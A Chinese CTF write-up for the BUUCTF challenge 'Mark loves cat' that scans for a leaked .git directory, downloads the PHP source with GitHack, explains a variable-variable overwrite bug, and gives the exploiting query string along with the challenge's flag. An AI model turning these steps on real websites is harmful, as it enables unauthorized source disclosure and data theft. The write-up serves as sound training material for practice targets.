buuctf [BJDCTF2020]Mark loves cat 1

#buuctf [BJDCTF2020]Mark loves cat 1

1、扫描目录,发现git源码泄露:

python dirsearch.py -u http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/

image-20240527230235907

2、下载源码,用githack

python githack.py http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/.git

image-20240527230253443

3.下载看到index.php 的源码,还有flag.php的源码

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

flag在flag变量中;根据源码,我们只需要exit($flag)即可以得到flag

1、我们只需要让$handsome=$flag
2、$yds=$flag
3、$is=$flag

构造pyload:

?handsome=flag&flag=handsome
传入handsome=flag则:
$x=handsome $y=flag
$$x=$handsome $$y=$flag
$handsome=$flag

因为$_GET['flag'] === $x && $x !== 'flag'
所以让flag=handsome
就执行exit($handsome)

剩下两个就不举例了

http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/?handsome=flag&flag=handsome
#flag{78246fc9-23ca-422f-b2ea-f7677c6c6370}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值